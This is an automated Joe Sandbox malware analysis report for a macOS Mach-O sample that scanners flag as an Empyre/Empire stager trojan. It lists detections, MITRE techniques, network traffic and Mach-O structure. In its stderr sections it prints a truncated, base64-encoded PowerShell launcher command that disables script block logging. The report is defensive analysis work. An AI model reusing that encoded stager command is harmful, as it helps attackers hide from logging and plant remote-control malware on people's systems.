Play interactive tour

Edit tour

Analysis Report SwWPxGBaKt.macho

Overview

General Information

Sample Name:	SwWPxGBaKt.macho
Analysis ID:	538
MD5:	480e81fbccf44939cf4ad4d21f9ba230
SHA1:	ff68dd82ddd872b04b8605adfc7be8f42bb38b0e
SHA256:	c364dcfa20543edbe9af0c94bedab5d79002277f97dfcbea3a704e5b4f1088e9
Infos:
Most interesting Screenshot:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Process executable has a file extension which is uncommon (probably to disguise the executable)

Contains symbols with paths

Classification

Startup

System is macvm-highsierra

mono-sgen32 New Fork (PID: 571, Parent: 493)

SwWPxGBaKt.macho (MD5: 480e81fbccf44939cf4ad4d21f9ba230) Arguments: /Users/berri/Desktop/SwWPxGBaKt.macho

cleanup

Yara Overview

No yara matches

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: SwWPxGBaKt.macho

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: SwWPxGBaKt.macho	Virustotal: Detection: 33%			Perma Link
Source: SwWPxGBaKt.macho	ReversingLabs: Detection: 44%

Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.109.202
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.90.177
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.90.177
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.109.202
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp	String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp	String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp	String found in binary or memory: http://www.apple.com/certificateauthority0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp	String found in binary or memory: https://www.apple.com/appleca/0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.0000000103002000.0000000103042000.rw-.sdmp	String found in binary or memory: https://www.python.org/psf/license/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49238
Source: unknown	Network traffic detected: HTTP traffic on port 49238 -> 443

Source: classification engine

Classification label: mal60.evad.macMACHO@0/0@0/0

Source: submission SwWPxGBaKt.macho	Mach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o
Source: submission SwWPxGBaKt.macho	Mach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/AppDelegate.o
Source: submission SwWPxGBaKt.macho	Mach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/
Source: submission SwWPxGBaKt.macho	Mach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/

Source: submitted sample

Stderr: File '<string>'; line 1 wershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbAB1AEUAKAAkAE4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABMAGUAQwB0AGkATwBOAFMALgBHAGUATgBlAHIAaQBjAC4ARABJAGMAVABJAE8ATgBBAHIAWQBbAFMAVABSAEkAbgBnACwAUwBZAHMAVABlAG0ALgBPAEIASgBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABzAEUAewBbAFMAQwBSAGkAUABUAEIATABPAEMAawBdAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAdQBFACgAJABOAFUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwB0ACAAQwBvAGwATABlAEMAVABJAE8AbgBzAC4ARwBFAG4AZQByAGkAQwAuAEgAYQBTAGgAUwBFAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBCAEwAWQAuAEcARQBUAFQAW ^SyntaxError: invalid syntax: exit code = 0

Hooking and other Techniques for Hiding and Protection:

Process executable has a file extension which is uncommon (probably to disguise the executable)

Show sources

Source: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 (PID: 571)

Process executable with extension: /Users/berri/Desktop/SwWPxGBaKt.macho

Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist			Jump to behavior
Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Masquerading1	OS Credential Dumping	System Information Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SwWPxGBaKt.macho	33%	Virustotal		Browse
SwWPxGBaKt.macho	45%	ReversingLabs	MacOS.Trojan.Empr
SwWPxGBaKt.macho	100%	Avira	OSX/Empr.vpkof

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.python.org/psf/license/	SwWPxGBaKt.macho, 00000571.00000271.9.0000000103002000.0000000103042000.rw-.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
17.171.27.65	unknown	United States	714	APPLE-ENGINEERINGUS	false
17.253.109.202	unknown	United States	6185	APPLE-AUSTINUS	false
2.22.90.177	unknown	European Union	20940	AKAMAI-ASN1EU	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	538
Start date:	08.04.2021
Start time:	10:55:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 3m 36s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	SwWPxGBaKt.macho
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Virtual Machine, High Sierra (Office 2016 v16.16, Java 11.0.2+9, Adobe Reader 2019.010.20099)
Analysis Mode:	default
Detection:	MAL
Classification:	mal60.evad.macMACHO@0/0@0/0
Warnings:	Show All Excluded domains from analysis (whitelisted): lb._dns-sd._udp.0.11.168.192.in-addr.arpa

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AKAMAI-ASN1EU	nnrlOwKZlc.exe	Get hash	malicious	Browse	2.20.142.210
	cMOtS8JQVW.exe	Get hash	malicious	Browse	2.20.142.209
	ekdCcEl5KV.exe	Get hash	malicious	Browse	2.20.142.210
	payroll.html	Get hash	malicious	Browse	23.0.174.219
	payroll.html	Get hash	malicious	Browse	23.0.174.219
	0705UKdp.exe	Get hash	malicious	Browse	104.123.31.226
	Remittance.html	Get hash	malicious	Browse	184.31.91.23
	ProcessFresh	Get hash	malicious	Browse	184.31.91.23
	wildix-collaboration-mobile.apk	Get hash	malicious	Browse	104.126.36.152
	wildix-collaboration-mobile.apk	Get hash	malicious	Browse	104.126.36.235
	Curriculo Laura Sperandio.xlsm	Get hash	malicious	Browse	92.122.213.192
	zrmbk.exe	Get hash	malicious	Browse	2.20.142.209
	steam.exe	Get hash	malicious	Browse	92.122.213.232
	p	Get hash	malicious	Browse	95.101.185.4
	xSf	Get hash	malicious	Browse	95.101.185.4
	FileZilla_3.52.2_win64_sponsored-setup.exe	Get hash	malicious	Browse	92.123.77.73
	FileZilla_3.52.2_win64_sponsored-setup.exe	Get hash	malicious	Browse	2.20.143.38
	equinix-customer-portal.apk	Get hash	malicious	Browse	95.101.20.19
	parler.apk	Get hash	malicious	Browse	95.101.20.11
	mobdro.apk	Get hash	malicious	Browse	2.20.143.13

JA3 Fingerprints

No context

Dropped Files

No context

Runtime Messages

Command:	/Users/berri/Desktop/SwWPxGBaKt.macho
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	File '<string>'; line 1 wershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbAB1AEUAKAAkAE4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABMAGUAQwB0AGkATwBOAFMALgBHAGUATgBlAHIAaQBjAC4ARABJAGMAVABJAE8ATgBBAHIAWQBbAFMAVABSAEkAbgBnACwAUwBZAHMAVABlAG0ALgBPAEIASgBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABzAEUAewBbAFMAQwBSAGkAUABUAEIATABPAEMAawBdAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAdQBFACgAJABOAFUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwB0ACAAQwBvAGwATABlAEMAVABJAE8AbgBzAC4ARwBFAG4AZQByAGkAQwAuAEgAYQBTAGgAUwBFAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBCAEwAWQAuAEcARQBUAFQAW ^ SyntaxError: invalid syntax

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Entropy (8bit):	3.354292401855357
TrID:	Mac OS X Mach-O 64bit Intel executable (20004/1) 100.00%
File name:	SwWPxGBaKt.macho
File size:	25104
MD5:	480e81fbccf44939cf4ad4d21f9ba230
SHA1:	ff68dd82ddd872b04b8605adfc7be8f42bb38b0e
SHA256:	c364dcfa20543edbe9af0c94bedab5d79002277f97dfcbea3a704e5b4f1088e9
SHA512:	e914e4dd698df816540b41bbdfa4f342dbc6ebe49e7b2b46e5c8b25fb7b61b4cdcb45b87baec355c3ff3efb30fe6b78dd1037d3616e15dd31d48120e45f0557c
SSDEEP:	384:dWvPTo8CduyVFwZqbOpFZ4wYMj+iOPZf6QTN:dQs8SucCqbqZ4vMHQT
File Content Preview:	....................P..... .........H...__PAGEZERO..............................................................__TEXT................... ............... ......................__text..........__TEXT.........................................................

Static Mach Info

General Information for header 1
Endian:	<
Size:	64-bit
Architecture:	x86_64
Filetype:	execute
Nbr. of load commands:	20
Entry point:	0xAA0

segment_command_64 aggregated: 4

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0x2000

fileoff

0x0

filesize

0x2000

maxprot

0x7

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	align	reloff	nreloc	flags
__text	__TEXT	0x1000009F0	0x20C	0x9F0	0x4	0x0	0	0x80000400
__stubs	__TEXT	0x100000BFC	0x42	0xBFC	0x1	0x0	0	0x80000408
__stub_helper	__TEXT	0x100000C40	0x7E	0xC40	0x2	0x0	0	0x80000400
__cstring	__TEXT	0x100000CC0	0x8BA	0xCC0	0x4	0x0	0	0x2
__objc_classname	__TEXT	0x10000157A	0x2D	0x157A	0x0	0x0	0	0x2
__objc_methname	__TEXT	0x1000015A7	0x626	0x15A7	0x0	0x0	0	0x2
__objc_methtype	__TEXT	0x100001BCD	0x3E9	0x1BCD	0x0	0x0	0	0x2
__unwind_info	__TEXT	0x100001FB8	0x48	0x1FB8	0x2	0x0	0	0x0

Name

Value

segname

__DATA

vmaddr

0x100002000

vmsize

0x1000

fileoff

0x2000

filesize

0x1000

maxprot

0x7

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	align	reloff	nreloc	flags
__got	__DATA	0x100002000	0x8	0x2000	0x3	0x0	0	0x6
__nl_symbol_ptr	__DATA	0x100002008	0x10	0x2008	0x3	0x0	0	0x6
__la_symbol_ptr	__DATA	0x100002018	0x58	0x2018	0x3	0x0	0	0x7
__objc_classlist	__DATA	0x100002070	0x8	0x2070	0x3	0x0	0	0x10000000
__objc_protolist	__DATA	0x100002078	0x10	0x2078	0x3	0x0	0	0x0
__objc_imageinfo	__DATA	0x100002088	0x8	0x2088	0x2	0x0	0	0x0
__objc_const	__DATA	0x100002090	0x940	0x2090	0x3	0x0	0	0x0
__objc_ivar	__DATA	0x1000029D0	0x8	0x29D0	0x3	0x0	0	0x0
__objc_data	__DATA	0x1000029D8	0x50	0x29D8	0x3	0x0	0	0x0
__data	__DATA	0x100002A28	0xB0	0x2A28	0x3	0x0	0	0x0

Name	Value
segname	__LINKEDIT
vmaddr	0x100003000
vmsize	0x4000
fileoff	0x3000
filesize	0x3210
maxprot	0x7
initprot	0x1
nsects	0
flags	0x0

dyld_info_command aggregated: 1

Name	Value
rebase_off	12288
rebase_size	160
bind_off	12448
bind_size	152
weak_bind_off	0
weak_bind_size	0
lazy_bind_off	12600
lazy_bind_size	264
export_off	12864
export_size	128

symtab_command aggregated: 1

Name	Value
symoff	13008
nsyms	66
stroff	14164
strsize	1328

dysymtab_command aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	45
iextdefsym	45
nextdefsym	5
iundefsym	50
nundefsym	16
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	14064
nindirectsyms	25
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

dylinker_command aggregated: 1

Name

Value

name

Datas

/usr/lib/dyld

uuid_command aggregated: 1

Name	Value
uuid	b'AQ\x8e\xa1\x17.?\x1c\x82\x08\x884\xdc\x9b\xf4\x8c'

version_min_command aggregated: 1

Name	Value
version	658176
sdk	658176

source_version_command aggregated: 1

Name	Value
version	0

entry_point_command aggregated: 1

Name	Value
entryoff	2720
stacksize	0

dylib_command aggregated: 4

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

2.7.10

compatibility_version

2.7.0

Datas

/System/Library/Frameworks/Python.framework/Versions/2.7/Python

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1258.0.0

compatibility_version

300.0.0

Datas

/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

228.0.0

compatibility_version

1.0.0

Datas

/usr/lib/libobjc.A.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1226.10.1

compatibility_version

1.0.0

Datas

/usr/lib/libSystem.B.dylib

rpath_command aggregated: 1

Name

Value

path

Datas

@executable_path/../Frameworks

linkedit_data_command aggregated: 3

Name	Value
dataoff	12992
datasize	16

Name	Value
dataoff	13008
datasize	0

Name	Value
dataoff	15504
datasize	9600

Internal Symbols

-[AppDelegate .cxx_destruct]

-[AppDelegate applicationDidFinishLaunching:]

-[AppDelegate applicationWillTerminate:]

-[AppDelegate setWindow:]

-[AppDelegate window]

/Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/

/Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/AppDelegate.o

/Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o

AppDelegate.m

_OBJC_CLASS_$_AppDelegate

_OBJC_CLASS_$_NSObject

_OBJC_IVAR_$_AppDelegate._window

_OBJC_METACLASS_$_AppDelegate

_OBJC_METACLASS_$_NSObject

_PyRun_SimpleStringFlags

_Py_Finalize

_Py_Initialize

___stack_chk_fail

___stack_chk_guard

__mh_execute_header

__objc_empty_cache

_activateStager

_main

_memcpy

_objc_autoreleaseReturnValue

_objc_destroyWeak

_objc_loadWeakRetained

_objc_storeStrong

_objc_storeWeak

_setlocale

dyld_stub_binder

main.m

External symbols

_PyRun_SimpleStringFlags

_Py_Finalize

_Py_Initialize

___stack_chk_fail

_memcpy

_objc_autoreleaseReturnValue

_objc_destroyWeak

_objc_loadWeakRetained

_objc_storeStrong

_objc_storeWeak

_setlocale

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 10:56:08.303731918 CEST	49238	443	192.168.11.11	17.171.27.65
Apr 8, 2021 10:56:08.303963900 CEST	49238	443	192.168.11.11	17.171.27.65
Apr 8, 2021 10:56:08.417180061 CEST	443	49238	17.171.27.65	192.168.11.11
Apr 8, 2021 10:56:08.417249918 CEST	443	49238	17.171.27.65	192.168.11.11
Apr 8, 2021 10:56:08.417785883 CEST	49238	443	192.168.11.11	17.171.27.65
Apr 8, 2021 10:56:32.378993988 CEST	49247	80	192.168.11.11	17.253.109.202
Apr 8, 2021 10:56:32.379209995 CEST	49248	80	192.168.11.11	2.22.90.177
Apr 8, 2021 10:56:32.389942884 CEST	80	49248	2.22.90.177	192.168.11.11
Apr 8, 2021 10:56:32.390476942 CEST	49248	80	192.168.11.11	2.22.90.177
Apr 8, 2021 10:56:32.400599957 CEST	80	49247	17.253.109.202	192.168.11.11
Apr 8, 2021 10:56:32.401242018 CEST	49247	80	192.168.11.11	17.253.109.202

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 10:56:35.845971107 CEST	57325	53	192.168.11.11	1.1.1.1
Apr 8, 2021 10:56:35.852438927 CEST	53	57325	1.1.1.1	192.168.11.11

System Behavior

Analysis Process: mono-sgen32 PID: 571 Parent PID: 493

General

Start time:	10:56:05
Start date:	08/04/2021
Path:	/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
Arguments:	n/a
File size:	3722408 bytes
MD5 hash:	8910349f44a940d8d79318367855b236

Analysis Process: SwWPxGBaKt.macho PID: 571 Parent PID: 493

General

Start time:	10:56:05
Start date:	08/04/2021
Path:	/Users/berri/Desktop/SwWPxGBaKt.macho
Arguments:	/Users/berri/Desktop/SwWPxGBaKt.macho
File size:	25104 bytes
MD5 hash:	480e81fbccf44939cf4ad4d21f9ba230

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SwWPxGBaKt.macho

Overview

General Information

Detection

Signatures

Classification

Startup

Yara Overview

Signature Overview

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Runtime Messages

Created / dropped Files

Static File Info

General

Static Mach Info

General Information for header 1

Internal Symbols

External symbols

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

System Behavior

Analysis Process: mono-sgen32 PID: 571 Parent PID: 493

General

Analysis Process: SwWPxGBaKt.macho PID: 571 Parent PID: 493

General